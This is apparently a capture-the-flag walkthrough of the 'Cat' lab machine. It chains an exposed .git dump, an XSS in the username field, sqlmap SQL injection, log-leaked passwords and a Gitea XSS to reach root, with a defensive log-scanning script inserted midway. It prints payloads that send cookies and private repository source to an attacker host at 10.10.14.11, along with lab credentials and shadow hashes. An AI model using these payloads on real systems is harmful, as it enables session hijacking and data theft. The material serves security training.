Basic information

Port scan

Only ports 22 and 80 are open:

$ nmap -sC -sV -Pn 10.10.11.53
Starting Nmap 7.95 ( https://nmap.org ) at 2025-02-05 13:27 CST
Nmap scan report for 10.10.11.53
Host is up (0.22s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 96:2d:f5:c6:f6:9f:59:60:e5:65:85:ab:49:e4:76:14 (RSA)
| 256 9e:c4:a4:40:e9:da:cc:62:d1:d6:5a:2f:9e:7b:d4:aa (ECDSA)
|_ 256 6e:22:2a:6a:6d:eb:de:19:b7:16:97:c2:7e:89:29:d5 (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Did not follow redirect to http://cat.htb/
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 72.08 seconds

80

A hosts entry is needed:

10.10.11.53 cat.htb

A cat contest website 🐱:

Directory scan

The directory scan reveals an exposed .git directory:

gobuster dir -w ~/Tools/dict/SecLists/Discovery/Web-Content/common.txt  -t 50 -u http://cat.htb/

/.git/config (Status: 200) [Size: 92]
/admin.php (Status: 302) [Size: 1] [--> /join.php]
/css (Status: 301) [Size: 300] [--> http://cat.htb/css/]
/img (Status: 301) [Size: 300] [--> http://cat.htb/img/]
/index.php (Status: 200) [Size: 3075]
/server-status (Status: 403) [Size: 272]
/uploads (Status: 301) [Size: 304] [--> http://cat.htb/uploads/]

git dump

Standard git dump:

git-dumper http://cat.htb//.git/ cat_git

XSS filter bypass

Looking at the code, the cat contest submission form applies a strict XSS filter:

But it only filters the cat-related fields; the owner field, i.e. our username, is not filtered:

So we use an XSS payload as the username, submit a cat entry, and see the callback:

<script src="http://10.10.14.11:7777/xss.js"></script>

XSS

The XSS returns the admin cookie; replace ours with it, refresh, and we are now admin:

PHPSESSID=179lnimkp5p8dpd6l69hav74ng

xss.js

var xhr=new XMLHttpRequest();
xhr.open("GET", "http://10.10.14.11:7777/?"+document.cookie, true);
xhr.send();

SQL injection

Next, look at the admin functionality code. view cat takes cat_id, but applies a forced type cast, so it is not injectable:

accept cat, on the other hand, puts catName directly into the SQL statement:

So catName in the accept cat request is injectable; just point sqlmap at it:

sqlmap -r sql.txt -p catName --dbms sqlite --level 5 --risk 3 -v 3 --technique=BEST --tables

+-----------------+
| accepted_cats |
| cats |
| sqlite_sequence |
| users |
+-----------------+

sqlmap -r sql.txt -p catName --dbms sqlite --level 5 --risk 3 -v 3 --technique=BEST -T users --dump

rosa ac369922d560f17d6eeb8b2c7dec498c
# the hash is found on cmd5
soyunaprincesarosa

rosa to axel

Log in with the recovered credentials; rosa is in the adm group:

log

The adm group can read the logs, and a simple grep turns up axel's password:

grep -irn  password /var/log | grep axel

/var/log/apache2/access.log.1:347414:127.0.0.1 - - [04/Feb/2025:23:59:54 +0000] "GET /join.php?loginUsername=axel&loginPassword=aNdZwgC4tI9gnVXv_e3Q&loginForm=Login HTTP/1.1" 302 329 "http://cat.htb/join.php" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:134.0) Gecko/20100101 Firefox/134.0"

axel aNdZwgC4tI9gnVXv_e3Q
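The leak above exists because the login form sent credentials as GET parameters, so they landed in the Apache access log, which every member of adm can read. As an added defender-side example (not from the writeup), the Python below scans combined-format access log lines, optionally prefixed by grep's `file:line:` marker, and reports requests whose query string carries a password-like parameter name, without echoing the value itself. The log lines are constructed, with the password replaced by a placeholder.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Apache "combined" format: client ident user [time] "request" status bytes "referer" "agent"
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) (?P<proto>[^"]+)" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)
# Optional "/path/to/access.log.1:347414:" prefix left by `grep -rn`.
GREP_PREFIX = re.compile(r'^[^\s:]+:\d+:')
# Parameter names that should never travel in a URL query string.
SENSITIVE = re.compile(r'passw|pwd|secret|token|session', re.I)

def find_leaked_credentials(lines):
    """Return one finding per log line whose query string names a sensitive parameter.

    Only parameter *names* are reported, so the output can be handed to a
    ticketing system without re-leaking the value that the log already exposes.
    """
    findings = []
    for line in lines:
        line = GREP_PREFIX.sub('', line.strip(), count=1)
        m = LOG_RE.match(line)
        if not m:
            continue  # not an access-log line we understand
        target = urlsplit(m['target'])
        params = parse_qsl(target.query, keep_blank_values=True)
        hits = [name for name, _ in params if SENSITIVE.search(name)]
        if hits:
            findings.append({
                'client': m['client'],
                'time': m['time'],
                'method': m['method'],
                'path': target.path,
                'sensitive_params': hits,
            })
    return findings

# Constructed sample lines; the first mirrors the shape of the leaked line above,
# with the real password replaced by a placeholder.
SAMPLE_LOG = [
    '/var/log/apache2/access.log.1:347414:127.0.0.1 - - [04/Feb/2025:23:59:54 +0000] '
    '"GET /join.php?loginUsername=axel&loginPassword=EXAMPLE-PLACEHOLDER&loginForm=Login HTTP/1.1" '
    '302 329 "http://cat.htb/join.php" "Mozilla/5.0"',
    '10.0.0.5 - - [04/Feb/2025:23:59:55 +0000] "GET /admin.php?cat_id=3 HTTP/1.1" 200 1337 "-" "Mozilla/5.0"',
    '10.0.0.6 - - [05/Feb/2025:00:00:01 +0000] "POST /join.php HTTP/1.1" 302 329 "-" "Mozilla/5.0"',
]

if __name__ == '__main__':
    for f in find_leaked_credentials(SAMPLE_LOG):
        print(f"{f['time']} {f['client']} {f['method']} {f['path']} leaks {f['sensitive_params']}")
```

The same check run over a live log is a cheap way to catch forms that submit secrets via GET before an attacker with log access does.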

user flag

Log in as axel:

mail

On login, axel is told there is new mail; the message mentions a Gitea instance on local port 3000:

Gitea

Forward the port out to take a look:

ssh axel@10.10.11.53 -L 3000:127.0.0.1:3000

It is Gitea 1.22.0. axel's credentials log in, but the Employee-management project mentioned in the mail is not visible:

A search turns up an XSS vulnerability affecting this Gitea version;

so the intended path is to use XSS to read the project. The mail also mentions sending mail to jobert@localhost, so the XSS targets jobert, who has permission to view that project.

xss

Step by step: create a repo and set its description to the XSS payload.

Then send mail to jobert. SMTP is not exposed externally, so use sendmail locally on the machine:

echo -e "Subject: test \n\nhttp://localhost:3000/axel/miao" | sendmail jobert@localhost

We get the page content back:

It contains the admin password:

$valid_username = 'admin';
$valid_password = 'IKw75eR0MR7CMIxhH0';

xss payload

<a href="javascript:fetch('http://localhost:3000/administrator/Employee-management/raw/branch/main/index.php').then(response => response.text()).then(data => fetch('http://10.10.14.11:7777/?response=' + encodeURIComponent(data))).catch(error => console.error('Error:', error));">XSS test</a>

root flag

The password we read is also the root password:

IKw75eR0MR7CMIxhH0

shadow

root:$6$gZWufTq2.hEhrNx3$9xZG.3MLpfYOJo8EN24H5CoT5sJ24F7vWeky5tU4QTZ1sVKwngFUxfbAqlorjEP.aliWJZA7jS3Bxnc5HvKiH1:19994:0:99999:7:::
axel:$6$Qin7PtKZAmITZJvt$dNoqvN0S7anYjIHW6nwrene2XI1vBCg49koRHVpnJlCYdDn75QLsL.5CStdukiXRejTMKaHSbckmlCfaf47jn1:19882:0:99999:7:::
rosa:$6$Gcl0Zhl7CRxJqHRi$CG7HwjG/OoMBS3hnrs9m6.Wgs.CxQ.xFNqI2VTN/xMZifc06kxRUh6xgS1/wIrhObeLnqcYDTQlFi2lN0eyXS/:19966:0:99999:7:::
jobert:$6$AYGcjhL4z59iTO0E$degFih9k1URjYwU7lMH3YKIXQEL5DfU1y833UEItzgQJgmBBsv55SW.R6EAMFUKegShaWmCPAlNfGhPxvLqW6.:19965:0:99999:7:::
